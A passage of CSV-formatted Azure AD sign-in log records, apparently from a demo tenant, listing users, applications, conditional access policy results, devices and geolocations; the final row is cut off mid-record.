+1252,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:06.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5fee88ee-d499-4581-afd3-637fcafadb1a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f81997e3-0b26-42cc-8532-c4de42380e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f81997e3-0b26-42cc-8532-c4de42380e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1253,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:06.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0f39072f-4724-48c3-b19c-b3bf1d5e7308,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",65ce963c-c870-4311-8389-19e58cca0c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,65ce963c-c870-4311-8389-19e58cca0c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1254,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:37.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",f4385ae5-d471-4f39-91b1-8dc5707a2a00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f4385ae5-d471-4f39-91b1-8dc5707a2a00,SigninLogs,Sucess,51.4458313,-0.969720006
+1255,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:30.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,769a5c60-6494-4d80-8950-779e8e8d1bd1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbc0f99c-7bef-40f5-9b26-c77d635c1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cbc0f99c-7bef-40f5-9b26-c77d635c1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1256,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:34.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ad1a5f9f-a496-4876-8d5c-1abac9bd20e6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbc0f99c-7bef-40f5-9b26-c77dfc5c1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,cbc0f99c-7bef-40f5-9b26-c77dfc5c1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1257,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:28.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ba210d4e-f482-4e04-8009-0aff7b87a9aa,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0eab89d1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,8d371308-4e1f-476f-97d6-c0eab89d1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1258,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:44.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,19ecf017-2c61-45f5-90fa-b066c26b74cd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea0ea01500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,8d371308-4e1f-476f-97d6-c0ea0ea01500,SigninLogs,Sucess,33.7984581,-84.38828278
+1259,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:36.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f5793659-7f30-46d5-93bc-4e324df21682,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",24b904d7-063a-4f4c-9637-40c772e51500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint 